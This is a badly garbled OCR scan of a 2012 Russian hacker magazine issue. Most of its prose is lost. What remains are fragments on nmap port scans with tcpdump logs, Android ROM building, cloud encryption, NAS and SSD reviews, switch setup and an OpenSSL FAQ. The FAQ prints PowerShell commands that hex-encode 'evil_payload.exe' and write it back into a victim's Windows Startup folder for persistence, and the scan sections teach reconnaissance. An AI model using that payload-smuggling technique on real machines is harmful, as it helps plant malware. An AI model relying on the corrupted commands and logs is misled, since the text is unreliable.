15 : 49 :38 .719457 IP 192 . 168 . . 111 . 22 > 192.168..100.433 37: Flags [5. ] , seq 349677 23 9. ac k 261 24278, win 32768,
+ options [mss 16396,sackOK,T5 val 94976812 94976812 .nop.wscale 5] , length 0
15 : 49 :38 .719463 IP 192 . 168 . .100.43337 > 192 . 168 . . 111.22 : Flags [ . J. ack 1. win 1025, options [nop,nop,T5 val 94
+976812 94976812], length
15 : 49:38.719883 IP 192.168 . . 10 . 4887 > 192 . 168.0 . 110.111: Flags [5 ], seq 472646806 , win 32792 . options [mss 16
+396.sackOK.T5 val 94976812 e,nop,wscale 5J, length 0

1. -

01 /156/2012

109

UNIXOID
16:30:16.611690 IP 192.168.0.100.48585 > 192.168.0.111.135: Flags [S], seq 1679394613, win 4096, options [mss 1460], length 0
16:30:16.611700 IP 192.168.0.111.135 > 192.168.0.100.48585: Flags [R.], seq 0, ack 1679394614, win 0, length 0
16:30:16.611715 IP 192.168.0.100.48585 > 192.168.0.111.8080: Flags [S], seq 1679394613, win 3072, options [mss 1460], length 0
16:30:16.611724 IP 192.168.0.111.8080 > 192.168.0.100.48585: Flags [R.], seq 0, ack 1679394614, win 0, length 0
16:30:16.611738 IP 192.168.0.100.48585 > 192.168.0.111.23: Flags [S], seq 1679394613, win 2048, options [mss 1460], length 0
16:30:16.611748 IP 192.168.0.111.23 > 192.168.0.100.48585: Flags [R.], seq 0, ack 1679394614, win 0, length 0
16:30:16.611763 IP 192.168.0.100.48585 > 192.168.0.111.22: Flags [S], seq 1679394613, win 4096, options [mss 1460], length 0
16:30:16.611789 IP 192.168.0.111.22 > 192.168.0.100.48585: Flags [S.], seq 625029896, ack 1679394614, win 32792, options [mss 16396], length 0
16:30:16.611798 IP 192.168.0.100.48585 > 192.168.0.111.22: Flags [R], seq 1679394614, win 0, length 0
16:30:16.611816 IP 192.168.0.100.48585 > 192.168.0.111.111: Flags [S], seq 1679394613, win 1024, options [mss 1460], length 0

2. SN-

- ,

, -

SYN-nae (5 ). 8888,

, , ,

RST-nae. ,

, .

- , -

587

. ,

nmap

SYN-nae

22- (SSH) SYN-ACK:


192.168..1.43337
224277,

192.168..111.22:

Flags (5], seq

ack

>

192.168..1.48585

Flags (5],

192.168..111.22 :

seq 1679394613, ...

...

>

192.168..111.22
349677239,

>

tcpdump
2.

192.168..1.43337 :

26124278,

192.168..1.43337

>

192.168..111.22:

nmap

Flags (5.], seq

> 192.168..1.48585: Flags (5.],


ack 1679394614, ...
192.168..1.48585 > 192.168..111.22: Flags [R],
seq 1679394614, ...
192.168..111.22

seq

.. .

Flags (.], ack 1,

62529896,

, ,

RST-nae, .

SYN-ACK,

: , -,

, .

UD-. :

, ,

UD- ,

, n .

3
nmap

. ,

ICMP

uneachae:

, n
. , ,
,

nmap,

16 : 41 : 48.79831

, .

SN-

(nmap -sS). -

IP

192.168..1.612

192.168..111.18869:

16:41:48.798346 IP
192.168..1

UDP, length

192.168..111

udp port 18869

>

>

192.168 . .1:

unreachale,

ICMP

length 36

.
- ull-,

R-

(nmap -sN).

, .
,

Linux

RS-:

-, tv.adobe.com, n
,

RTMP .
tcpdump .

win

R- ,

192.168. . 111.256

192.168..1.39132
372,

length

>

Flags (],

192.168..111.256:

>

Flags (R.],

192.168..1.39132:

ms-

tcpdump -eflAi ethe -s -w - 1 strings 1 \


grep - "rtmp://.\+.flv"

FIN, URG PUSH (- ,

):

tmpdump (l kc l. net/tmp )

192.168..1.35331

flv- :

seq

$ ./rtmpdump -r 'URL'

seq

399895961,

win

192.168..111.5544
- .flv

ack

>

192.168..111.5544:

496,

>

urg

length

Flags (FPU],

192.168..1.35331:

Flags [R.],

399895962

, . -

110

01/156/2012

16:41:48.798310 IP 192.168.0.100.61020 > 192.168.0.111.18869: UDP, length 0
16:41:48.798346 IP 192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port 18869 unreachable, length 36
16:41:48.798371 IP 192.168.0.100.61020 > 192.168.0.111.31335: UDP, length 0
16:41:48.798384 IP 192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port 31335 unreachable, length 36
16:41:48.798400 IP 192.168.0.100.61020 > 192.168.0.111.50919: UDP, length 0
16:41:48.798412 IP 192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port 50919 unreachable, length 36
16:41:48.798429 IP 192.168.0.100.61020 > 192.168.0.111.54114: UDP, length 0
16:41:48.798441 IP 192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port 54114 unreachable, length 36
16:41:48.798456 IP 192.168.0.100.61020 > 192.168.0.111.6971: UDP, length 0
16:41:48.798467 IP 192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port 5971 unreachable, length 36
16:41:48.798483 IP 192.168.0.100.61020 > 192.168.0.100.19663: UDP, length 0
16:41:48.798495 IP 192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port 19663 unreachable, length 36
16:41:48.798510 IP 192.168.0.100.61020 > 192.168.0.111.19504: UDP, length 0
16:41:48.798522 IP 192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port 19504 unreachable, length 36

3. UD-

1-sA) tcpdump

17:48:58 .999718 IP 192.168...43949 > 173.19<:1.32. 18.00: Flags IP.J, seq 1835416245:1835417611, ack
~o~ln 557. opt lons [nop,~QJJ,TS val 9697~96 7652175631, Jength 1366


RST. , ,
nmap ,
. tcpdump

16:43:06.008305 IP 192.168.0.100 > 192.168.0.111: ICMP type-#68, length 1032
16:43:06.008383 IP 192.168.0.100 > 192.168.0.111: ICMP type-#34, length 1032
16:43:06.008714 IP 192.168.0.100 > 192.168.0.111: ICMP type-#183, length 1032
16:43:06.008831 IP 192.168.0.100 > 192.168.0.111: ICMP type-#192, length 1032


google.com tcpdump

, ,
.
I-

. ! , SYN)

, ,

tcpdump ,

. ,

Cisco Disco v ey Potocol ,

Cisco

.
,

tcpdump

# tcpdump -nn -v -i eth0 -s 1500 -c 1 \
'ether[20:2] == 0x2000'

Wieshak:
,

$ ssh root@example.ru tcpdump -w - 'port !22' \
| wireshark -k -i -

DHCP IDISCOVER, REQUEST, INFORMI,

'-w

Wieshak ,

# tcpdump -i eth0 -vvv -s 1500 '((port 67 or port 68) and (udp[8:1] = 0x1))'

St:

, -:

$ ssh root@example.ru "tcpdump -nn -i eth1 -w -" \
| snort -c /etc/snort/snort.conf -r -

g,
,

# tcpdump -i eth0 "tcp port pop3 and ip[40] = 85 and ip[41] = 83" -s 1500 -n

l:i!:Ii
tcpdump
,

, .

# tcpdump -nnvv -r dump.cap tcp | grep -v "tcp sum ok" | wc -l

01 / 156/2 012

,
. :::

111

ANDROID-POWBKY

l'' .,

Andoid

,

'

____
_ ...J
goo.g!I!IHRo

fa mewo k- es . ap k.

goo .gi/vz8

Andoid .

goo.gi/Ya!IX

n .

goo.gi/P6JR

IBM .

goo.g!lsGXwa

Andoid

L~nux,

Honeycomb.



Android :~~~~: ~

~: _ ,

, .
,
Andoid ..,..
.

ndid- ! '

Andold ,

2.
3.

~
~
n ~ ~ ~
. , ,
' .




3

~

11

META-IN F,

boot.img

system.

,
,
, ,
NND- ,
- ,
.

boot.img ,
Linu x initd.

/. ,
,

BFS

NFS,

xda-developes
ClockwokMod.
,

system -

, .


Andoid

Linux.

, .
:

- : , ,

. .

in - /in /us/in Linux.


,
. ,

xda-developes

dalvikvm.

t- . /t Linux,

, , .

Andoid /data/data.

fonts- .

, ,

Doid ! Roboto Andoid 4.01 .

C l ockwokMod ,

framework- Jv- ,

lo , ,

did- . famewok-es.apk,

][J.

, , ,

lib- L inu - ,

. ,

. /lib /us /lib Linu x,


, libc !,
Andoid Bionic Glibcl, libz lgz i

, .
?

l, libss l .

- , ,
xda - developes . com.

media- :

Mobile, Windows Phone

iOS, Windows

Andoid. ,

, ,

tts- , .

F oums

usr-

. Andoid

, in. ,

Development

<< u And oid

/ us/shae.

I ROM] >>. -

CyanogenMod,

2.3 Rom>>

, ,

!, , !.

vndr- , .
f im wae <<

>> ,

xbln -

Wi-Fi.

, ,

, , -

in . ,

, ltop,

ROM

unzip:

!. CyanogenMod
:

busybox

$ mkdir ~/rom; cd ~/rom


$ unzip . . / / / .zi

bash, ss h, powetop,

. .

build.prop- a, ,
.

/system/ap p

, , ,

. ,

Andoid, ,

, << >> . ,

NND- .

, Andoid l ADWLaunche
CyanogenModl . ,
LauncherPro lwww.launcherpro.com l:

Andoid ,
,

$ rm system/app/Launcher.apk
$ wget goo.gl/U9c54 -O system/app/LauncherPro.apk

. ,

SETPROP

, n n -

. , Andoid
n. .

build . pop n
n setpop:

n n n

# setprop debug.sf.nobootanimation 1

n n n n

!n, i ,

. , n
Diale

One

Phone.apk

sms.apk.

Linu-n, n

cepepa

mc?

Google,

ssh-

n.

Andoid n

Go SMS

ARM

n n

NDK

. n, n

mc

n.

xda-developes n n n

Midnight

Commande. n k-n

lgoo.gi/Pax1 Hl n n

layout XML l
AXML, apktool n XMLI.

n,
, , .
xda-developes, n
Andoid.
<<famewok-es

mod

_>>.


famewok-es.apk ,

unzip:

$ cd /tmp; unzip ~/Nativnuxinstaller_l.l.apk

, famewok-es

diff:

n n assets/kits/mc-4.7.5.4am.ta.jet . ta. gz, n

n k-n

la , n
apk, n n n lnstalll.
n n n n

$ diff -r ~/framework-res \
~/rom/system/framework/framework-res
,

famewok-es,

mc:

$ cd ~/rom
$ tar -xzf /tmp/assets/kits/mc-4.7.5.4-arm.tar.jet

4PDA: goo.gl/t iH Ro.

famewok-es.apk

mc.

zi- n

aapt

apktool.

Andoid

SDK,

apktool

k-.
:

ClockwokMod Recovey. ,

$ cd ~/bin; wget goo.gl/tC7k8

-/oml n uzip.

Andoid .

$ cd ~/rom/system/framework
$ java -jar ~/apktool.jar b framework-res

n Andoid, , .

Andoid famewok/

framwork-res/dist/framework-res.apk
$ rm -rf framework-res

11

famewok-es . apk .
- .

apktool:

ng-,

$ cd ~; wget goo.gl/hxzSl
$ tar -xjf apktool1.4.1.tar.bz2
$ cd ~/rom/system/framework
$ java -jar ~/apktool.jar d framework-res.apk

system/

media/bootanimation .zip. :

$ cd /tmp
$ mkdir bootanimation; cd bootanimation


famewok-es, .

- s/dw-* es/layout-*
ng-
. , dawae

land-mdpi-

l n n n
!. ,


, &

&

ANDROID


build.prop Motorola Defy

FPS 241:

$ mplayer -nosound -vo png:z=9 video.avi


. xda-developes
,

n . n
.


, ,-
.

Android

system/build . pop,
n .
,

Andoid, .
.

ClockworkMod Recovery:

Android

1.

ro.HOME_APP_ADJ=1

$ unzip ~/rom/system/media/bootanimation.zip

desc.txt,

n n:

n
n n

n .

FPS

n.

2.

JG-:

ro.media.enc.jpeg.quality=100
4Se see
1 parte
partl

,
n .

480

800,

3.

IFPSI 30 / .

n
:

n n ,

t. n ! 1 n
pl. lpatll n
, n n . t

debug.sf.nobootanimation=1
4.

GPU:

, n ,

t- , n

debug.sf.hw=1

. ,
n,

0001 .png, 0002.png

. .

n ,

n .

5. !n n
n n USBI:

. n

ng- n mencode l

desc.txt

persist.adb.notify=0

> cd /rom/system/framework/
> java - jar /apktool. jar d framework-res . apk

wifi.supplicant_scan_interval=180
pm.sleep_mode=1


ro.ril.disable.power.collapse=0

3.

ro.ril.enable.dtm=1

ro.ril.hsdpa.category=10
ro.ril.enable.a53=1
ro.ril.enable.3g.prefix=1

ro.ril.htcmaskw1.bitmask=4294967295
ro.ril.htcmaskw1=14449
ro.ril.hsupa.category=5
4.

1904

-w-----

ro.ril.hsxpa=2
ro.ril.gprsclass=10
ro.ril.hep=1

net.tcp.buffersize.default=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.wifi=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.umts=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.gprs=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.edge=4096,87380,256960,4096,16384,256960

framework-res.apk

> 1s -1
u

G-:

uses
uses
uses

1941504
4095
4095

.
HOSi .
.

29 2008 boot, img


8 15:33 META-INF
8 15:33 system

system/

build.pop .

ll*'lk

, , -


testsign .

zip:

$ cd ~/rom; zip -r my-rom.zip *

, Recovey
:

$ wget goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
my-rom.zip my-rom-signed.zip

m y -om-siged.zip
.

6.

R e covey,

!.

ro.lge.proximity.delay=25
mot.proximity.delay=25

data / facto y e se t>>,

Wipe

l Reco v ey <Ente>J,

7.

<< Choose zip


ro.mot.buttonlight.timeout=0
,

Yes

<Ente> .

<< lnstall zip

fom sdcad ,

fom sdcad , my-om-sign.zip 50-

Yes.
system now .

<<Reboot

l:l!:lel!tj
Adoid- ,

1.

debug.performance.tuning=1
video.accelerate.hw=1
windowsmgr.max_events_per_sec=150

, ,
,

2.

1/etc/init.dl,

. :::

11

Ubuntu 11.10

UBUNTU 11.10
Oneiic Ocelot [ )- 15- Linu- Canonical.

V- [

Unity.

-,

1,5 ),

[lnkscape, GIMP, Pitivi LibeOffice). 150-


CD/DVD, USB Flash.

>>.

!
>> ).

Linux kenel3.0.1;

Launche.

Unity 4.12.0 n
Compiz 0.9.6;
GNOME3.2;
no n
Mozilla Fiefox 7.0.1, Mozil la
Thudebld 7.0.1, LightDM,
Oeja Oup,

- Gwibbe;
LibeOffice

EJ

Uity
, >>

. ,
,

: ,

, ,

Ubutu Softwae Cente

5.0

, ,

Cente

OneConf,

IFile > Sync between computes ...).

n
U

<Ai t+Tab>.

-
, .

Qt Unity 20,

OpeGL. Uity

>>. ,

01/156/2012

<<

l ud -

, ,

!
Ubuntu, . .) Software

Banshee

Google Docs)

Rhythmbox

, ,

, .

Lenses,

LoCo

Ubuntu (Dash Home)


Places,

Ubuntu

(goo.gl/cC5k, ubuntu-defaults-builder),


Launcher.

ARM.

R- .

3.4.2;
Python 3.2, GCC 4.6.1, Bash 4.2, CUPS 1.5.0,
Pidgin 2.10.0, UDEV 173, X.Org 1.10.4;

Unity 3D,

Qt

2D

Qt Quick.

Unity 2D

Canonical
n

2013 .
Ubuntu 12.04,
2012 , LTS-,


n .

SYN/ACK

aka 13oz

qscentr.ru -
n GSPD


NQ687

781.


ISPDN.RU -

-
152-, .

3)

, -

152- << >>.

, ,

4)

152-.

, -

VLAN'a


SYN/ACK

grinder (grinder@tux.in.ua)

LUKS - code.google.com/p/cryptsetup

vGate R2 - securitycode.ru/products/sn_vmware/vgate_com

MySQL 5.6 Reference Manual - Encryption and Compression - clck.
!Lfru

Windows Azure SDK - microsoft.com/windowsazure/sdk

Novell Cloud Security Service - novell.com/products/cloud-security-service

FreeOTFE - freeotfe.org

<<>>

n

""Jr\1

>>

<< . ,

(PaaS)
(SaaS) ,
.
,
.

, l
). , . <<
,
, , ,
- .
, ,
, .

, ,

v-index.com ,

38,9 %.

,- . ,

. ,

PR,

- ,

.
,

SaaS (Software as a Service - )


PaaS (Platform as a Service - ) ,
, .

: - .
,
,

SaaS.

, ,

. ,

122

Google

Amazon,

<< ,

[Figure: V-INDEX 03 2011. Virtualization penetration rate: 38.9%; consolidation ratio: 5:1; hypervisor in use]

. , ComputerWorld,
, ,
, VMware
vSphere.

SaaS

- .
, ,

""'

[Figure: Gartner, virtualization industry]

SaaS

.
, -

. -
. ,

v-index.com, n

! ! .
,

, -

- .

- ->> ,

<<>>. ;l

, VMware,

R2 (securitycode.ru/products/sn_vmware/vgate_com).

. ,

- .
.

!
VMI. ,
, ! AC L ! .

vGate

- ,

IABI II

VM,

la !

. ,

, ,

-.

, . ,
.

DMZ

(VPN, /etc/hosts.allow).
DDS-

.
.

(gnu.org/philosophy/who-does-that-server-really-serve.html) << >>

, n.

SaaS

SS-

. , . ,

.
,
, .

Security Code TrustAccess (securitycode.ru/products/trustaccess)

. ?

, , ,

SaaS , ,

,
- VMware vCloud Director.

- ,
.

. ,

vGate
- Novell Cloud Security Service (NCSS, novell.com/products/cloud-security-service) -
,

>> .

NCSS

>>

(Active Directory). ,

SaaS/PaaS/IaaS, , NCSS

, -

, .

SaaS

Amazon 21,
NQ152

, .

<< >> [ clck . u / POdc l n

. ,

<<>>

. ,

SaaS

. ,

<<>>

. ,

, ,

, . -152

, ,

, ,

, << >>.

, ,

. ,

, ,

<< >>. ,

, .

[ !,

SaaS .
HTTPS,

. , <<

, -

<<>>,

PCI [Payment

d lnfastuctuel,
, : << >> - .

, ,

DM-CRYPT

, ,
,

PCI,

dm-crypt ,

2.6+

CryptoAPI.

, ,

, - . ,
- ? ,

ht.

<<

>> .

Windows

FreeOTFE,

Windows.

$ sudo apt-get install cryptsetup


:

$ sudo dd if=/dev/zero of=/dev/sda5 bs=4K

LUKS (The Linux Unified Key Setup, code.google.com/p/cryptsetup),


Linux dm-crypt , n
. LUKS
TKS1 (Template Key
Setup 1), ,
n ,
.

/dev/mapper/ :

Windows

FreeOTFE (freeotfe.org),


Linux (cryptoloop, dm-crypt)

$ sudo cryptsetup -y luksFormat /dev/sda5


$ sudo cryptsetup luksOpen /dev/sda5 encdisk

- HSM (Hardware Security Module,


n ! PKCS#11.
, n

Windows -

, .

BitLocker [ - EFS,

$ sudo mkfs.msdos /dev/mapper/encdisk


$ sudo mount -t vfat -o rw /dev/mapper/encdisk /mnt/encdisk

. ,

Encrypted File System).


,
. ,
, ,
:

. - n ,

$ sudo umount /mnt/encdisk


$ sudo cryptsetup luksClose /dev/mapper/encdisk

, . n,

MySQL Reference Manual

n. 11.13

Encryption

[Screenshots: MySQL 5.6 Reference Manual, section 11.13 Encryption and Compression Functions; the CRYPTSETUP(8) man page in a terminal]

Linux

dm-crypt

SQL- n

n,

, n .

, n ,

n .

> CREATE TABLE md5_tbl (md5_val CHAR(32), ...);
> INSERT INTO md5_tbl (md5_val, ...) VALUES(MD5('abcdef'), ...);

n . n ,
,
Trend Micro SecureCloud, n
FreeOTFE .

<<

API

n .

Windows Azure SDK

n ,
, , n

(microsoft.com/windowsazure/sdk), n

Windows Azure,
, n n CSP (Cryptographic Service Provider,

. n

n n ).

vCloud.

n,

, n
n

XSS

SQL injection

n . n

Amazon

2,

Eucalyptus

SecureCloud << >>,

. ,

/ .

, n, n n -

, n

<<>>- , , .

n , n

, n n

, . n

, ,

n , ,

. , . - ! n

n ! , )

. ::::

Trend Micro SecureCloud

FreeOTFE Linux

FERRUM

.,

As

5- 6-

NAS-CEPBEPOB

NAS]

\7

.
.

,
, . , >>

. -

RAID.

RAID.


n , n n .
, n
? - n

100

NAS.

n ,

n .

NAS

, .


n n n .

Intel NAS Performance Toolkit - n


NAS

. n

, n n n
n . n n

RAID 0.

RAID5

n .

n , n .
, - n

NAS.

n .


NAS

D-LINK SHARECENTER PRO 1200

D-Link

, n Ethernet

USB.

n
L-n . ,

n ,
n .

, ,
. ,
, ,
-n
.

D-Link

ShareCenter

1200

. n ,
n .
-

D-Link

. ,
n

iSCSI.

- .

NETGEAR READYNAS 6 ULTRA
n

NETGEAR

.
n .

NETGEAR ReadyNAS
6 Ultra
2 . , n

12 ,

. n

RAID 5.

>> FrontView. ,


n .
n n
.
n , n
n .

NETGEAR ReadyNAS 6 Ultra,

, .

NETGEAR READYNAS 6 ULTRA


NETGEAR ReadyNAS 6 Ultra Plus
NETGEAR ReadyNAS 6 Ultra.
.
- Intel

1,8

Atom,

Intel Pentium

2160,

. ,
n . ,
.
. n
FrontView

4.2.16

-,

RAID5

Boot Menu.

-,

. ,

NETGEAR ReadyNAS 6 Ultra .

,
<<>>. ,
,
.

QNAP TS-559 PRO+

QNAP TS-559

+,

QNAP

QNA P

, <<
.

QNAP TS-559

,
, .
VG- . ? ,
,
.

TS-559

VGA

QNAP

+ .

,
.

RAID5

<<

,
n .

D-Link ShareCenter Pro 1200

2 Ethernet (10/100/1000 /), 2


USB 2.0
JBOD, RAID 0, RAID 1, RAID 5, RAID 6,
RAID 10
CIFS/SMB, FTP, UPnP, , NFS, iSCSI

NETGEAR ReadyNAS 6 Ultra

Intel Atom Dual , 1,66


DDR2 DIMM 1 1
2 Ethernet (10/100/1000 /), USB 2.0

X-RAID2, RAID 0, RAID 1, RAID 5, RAID 6

CIFS/SMB, F, UPnP, , AFP, NFS, DLNA,
Bonjour

NETGEAR ReadyNAS 6 Ultra Plus

Intel Pentium 2160 , 1,8


DDR2 DIMM 1 1
2 Ethernet (10/100/1000 /), USB 2.0

X-RAID2, RAID 0, RAID 1, RAID 5, RAID 6

CIFS/SMB, F, UPnP, , AFP, NFS, DLNA,
Bonjour

SYNOLOGY DISKSTATION DS1511+


Synology DiskStation DS1511+ n
QNAP TS-559 Pro+. n
Synology n ,
. -,
. ,
. - ,
,

,
, .

. ,

y QNAP

TS-559 Pro+,

Synology

DiskStation

DS1511+

jl!-

, ,
, . ,
.
, -

. -

45

THECUS N5200XXX:

Thecus N5200XXX.


.
,

NETGEAR:

, , , .
>> : Intel

Atom D525

. ,
.
.
, .

L-, /

LAN- U5-.
Thecus N5200XXX

, .

, << ,
>>, , ,
.

Synology DiskStation DS1511+

THECUS

N5200XXX

, ,-
.
,

Intel Atom D525, 1,8


DDR2 1 1
2 Ethernet (10/100/1000 /), 5
USB 2.0, 2 eSATA, VGA
JBOD, RAID 0, RAID 1, RAID 5, RAID 5+,
RAID 6, RAID 6+, RAID 10, RAID 10+
CIFS/SMB, F, F, UPnP, ,
S, AFP, NFS, DLNA, Bonjour,
iSCSI, telnet, SSH, SNMP

Dual , 1,8
DDR2, 1 1
2 Ethernet (10/100/1000 /), 4
USB 2.0, 2 eSATA
JBOD, RAID 0, RAID 1, RAID 5, RAID 6,
RAID 10
CIFS/SMB, F, TFPT, UPnP, DLNA,
, AFP, NFS, Bonjour, iSCSI

Intel Atom D525, 1,8


R SOOIMM 1 1
2 Ethernet (10/100/1000
/), 5 USB 2.0, eSATA
JBOD, RAID 0, RAID 1, RAID 5,
RAID 6, RAID 10
CIFS/SMB, F, TFPT, UPnP,
, AFP, NFS, Bonjour, iSCSI

NAS,

5-

6-. , ,

Synology

Thecus.

QNAP,

<< .
<<

NETGEAR.

NAS

[ !,
. ::

FERRUM

SP060GBSSDV30S25

SILICON POWER

: SSD, 2,5
: SATA 3.0
: MLC

.
IOmeter,

. : 550 /
. : 500 /

SSD /

: 60
n TRIM :

, .

IO mete'a,

,
:

. . k

HDD,

Vantage,

. ,

Disk

Benchmark

550, ,
,

0,5 8192

n.


- 550

.
Silicon Power
SP060GBSSDV30S25. -
60 , Windows 7
n

, SandForce

SF-2000
MLC .
3-5 ,

.
Silicon Power

SP060GBSSDV30S25,

SATA 3.0,

IOmeter:
Random read 4 : 21,44 /
Random write 4 : 19,77 /
Seq. read 128 : 313,41 /
Seq. write 128 : 332 /
IOmeter patterns:
Database: 36,43 /
Fileserver: 41,08 /
Workstation: 34,50 /
Webserver: 51,35 /
PCMark Vantage:
Test Suite: 26076
Windows Defender: 42,95 /
Gaming: 176.73 /
Importing pictures to Windows Photo Gallery: 271,45 /
Windows Vista startup: 30,18 /
Video editing using Windows Movie Maker: 88,42 /
Windows Media Center: 340.73 /
Adding music to Windows Media Player: 151,54 /
Application loading: 167,14 /

. ,

Test Results

Size      Write     Read
0.5       19613     17280
1.0       35239     32256
2.0       50435     54001
4.0       164117    128548
8.0       237596    179971
16.0      316007    347832
32.0      446227    396128
64.0      463553    426883
128.0     486711    464703
256.0     488856    529998
512.0     493674    546588
1024.0    492542    554109
2048.0    493674    559240
4096.0    489176    559240
8192.0    493674    556663

, ,

IOmeter,
.
Silicon Power

SP060GBSSDV30S25

:
3 , 5 -

SSD,

480

,
,

.
Silicon Power

SP060GBSSDV30S25,

. :::::

3 000

000 *

MAN TV

PHREAKING

aka Lundes (sergey.lunder@gmail.com)

Rx

Receive

Transmit


(n n! .
Loop-arn. ,

, ,
, .

, . ,

, .

- : ! :


- . ,

,

: l"- : << l>> .


<< ! ! - << ? - << !- <<
l ? - <<, !

- .

,
,
. -

,
. ,

, .

(broadcast storm).

, ,

. , ,

- [. 11. <<-

... - .

loop_detection,

[! .
, - .
,

132


,
.

1. RJ45

: [
[ Ethernet [

Telnet

w-l.

.
Ethernet, IP-.

1.

W-


, , . . , w

80

- I-.

DLINK DES-3200
-,

.

1.

IP-
:
DES-3200# config ipif System ipaddress \
.../....

. . . -IP-, ....- .

2.

, IP- ,
:

DES-3200# show ipif


3.

w-

IP-

D-Link
RS-232,

,
,

Out-of-Band.

,
.

[, mil

Windows[. :
Baud rate: 9,
Data width: 8 bits
Parity:
Stop bits: 1
Flow Control:

Lk-

t .
,

DES-3200#.

, ,

, , .

. , tl+,

<<? ,

.
,

config,

RJ-45

DES-3200#config +

delete account
<username>.

,,?" t.

w- Telnet,

I- ,
. I-


CLI:


.
-
.

DES-3200# config ipif System dhcp,


DES-3200# config ipif System ipaddress \
.../....

: Admin User.
Admin .

... -IP-, .... - ,

System- .
.

CLI:

. D-Link

DES-3200# create account admin/user <username>

(!. n

n)

,

: << Enter case-sensitive new password>>.

D-Link

15

config ports. ,

, 10 /,

Success.

1-3

Admin :

Username "dlink":
DES-3200#create account admin dlink
Command: create account admin dlink
Enter case-sensitive new password:****
Enter the new password again for confirmation:****
Success.
DES-3200#

DES-3200#config ports 1-3 speed 10_full learning enable state enable
Command: config ports 1-3 speed 10_full learning enable state enable
Success
show ports < n>
.

: DES-3200# config account <username>

dlink:

DES-3200#config account dlink
Command: config account dlink
Enter old password:****
Enter case-sensitive new password:****
Enter the new password again for confirmation:****
Success.

: DES-3200# show account.

NVRAM.

save:

DES-3200#save
Command: save
Saving all settings to NV-RAM..
done.
DES-3200#

1%

LOOPBACK

r .
t:

IJ

- n n ,
n n
n. ,

lk-.

DES-3200#reboot
Command: reboot

. <<lk->>.
, , ,

, n .

reset.

DES-3200#reset config
-, n
reset, .

loop_detection Alcatel
interface range ethernet (1-24)
loopback-detection enable
exit
loopback-detection enable
loop_detection Dlink
enable loopdetect
config loopdetect recover_timer 1
config loopdetect interval 1
config loopdetect mode port-based
config loopdetect trap none
config loopdetect ports 1-24 state enabled
config loopdetect ports 25-26 state disabled

loopback .
.
, , -

, U-, , ,

Cshell,

Hello world

#!/bin/csh
# ver. 1
# , ~ n
if ( `ps | grep 'redbut' | grep -v 'grep' | wc -l` <= 1 ) then
# , snmp
set snmpdir = "/usr/local/bin/"
set community = "public"
# snmp
set snmpcmd = "-t1 -r1 -Oqv -c $community -v1 -Cf"
set mib_stat = "IF-MIB::ifOperStatus.$2"
set uid = "$1"
set fl = ''
#
while ( "$fl" == '' )
set nowstatus = `$snmpdir/snmpget $snmpcmd $uid $mib_stat | sed 's/up/1/;s/down/0/;/Wrong/d'`
if ( "$nowstatus" == 1 ) then
echo 'Hello World'
# e-mail (sender and recipient addresses are elided in the source)
echo "! Hello World!" | sendmail -f[__] [_]
endif
# the sleep interval is missing in the source; 5 seconds is an assumed placeholder
sleep 5
end
endif
exit

<< n . - .

(Rx Tx) .

2 6, 1 3.

, , -
-. .

n n n :

3.

, << >>

./script.csh

I_

link . Ypal
,

n << !

. , , ,

,J HELLO WORLD
Hello wold?

! n
n , n

- !

~ v.. n

n n ,

n , ,

: ?

n [ .

41.

n :

? ,
,

. << >>,
.

- -. n

n , >>,

, - .

, n . n
. ?
. . ? !
n

Hello World Cshell:

loop_detection , <<>>.

, n .
! :::

135

UNITS/FAQ UNITED

[lwliller.com/slepahl

FAQ United

r.t

FAQ@REAL.XAKEP.RU

OpenSSL

$ echo 'GET / HTTP/1.0' | openssl s_client -connect example.com:443
[ ... ]
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit

n .

LINUX SERVER?

$ openssl aes-256-cbc -d -in file-test.aes -out file-test-dec

SSLv.

SSL- . n

OpenSSLI -,
n

Linux server,

OpenSSL

TLSv1/

. ,

OpenSSL
speed test,

OpenSSL

4.

n n sh-. ,

, ,

n:

, ,

$ for f in * ; do [ -f "$f" ] && openssl aes-256-cbc -salt -in "$f" -out "$f.enc" -pass file:password.txt ; done

,
.

1.

GnuPG (www.gnupg.org), n
OpenSSL:

2.

$ openssl aes-256-cbc -salt -in file-test -out file-test.aes
enter aes-256-cbc encryption password:
Verifying - enter aes-256-cbc encryption password:

5- .

[F., . . l

OpenSSL n
SHA 1-1 SHA1

$ openssl sha1 file-test-64
SHA1(eapol-64)= afc594f26ca0878073769d24f8c04fe35f2bf8b3

file-test AES-256 ( CBC)


file-test.aes.

, SSL!TLS
n

nn NS- ,

I-

OpenSSL.

DNS-OTBETOB

&-.

3.

file-test -64:

r.t

....

5 :

$ openssl s_time -connect webserver.com:443

debug.exe.
64
. , debug .exe
Microsoft .
, Windows 7 Server 2008
PowerShell,

BIND [www.isc.org l.
NS-

DNS-c epep,

BIND,

ApateDNS (bit.ly/sZQiK1).

suit-n

Mandiant.

n NS - n

, .

I-, .

, ,

, ,

, n

ApateDNS [ n i,

NS-.

hosts?

136

DNS .



. ?

.
<<

>>
PowerShell:

PS > [byte[]] $hex = get-content -encoding byte -path C:\temp\evil_payload.exe
PS > [System.IO.File]::WriteAllLines("C:\temp\hexdump.txt", ([string]$hex))

did

NDRID-,

. ,

ANDROID?

GOOGLE,
!

,
,

Android'a,

Android SDK,

. ,

86. -

hexdump.txt -

. ,

Android -

x86 (www.android-x86.org),

77 9 144
184

64

255 255

232

ARM

Bluestacks

Bluestacks

(bluestacks.com). ,

(http://bit.ly/Ys901),

did-,


. !
,

~~

!,

!
!.

Store

S-:

.....,

PS > [string]$hex = get-content -path C:\Users\victim\Desktop\hexdump.txt
PS > [Byte[]] $temp = $hex -split ' '
PS > [System.IO.File]::WriteAllBytes("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\evil_payload.exe", $temp)


Android-x86, n
Nexus One!

VirtualBox,

n n ,

FakeDNS (bit.ly/szUFXI).

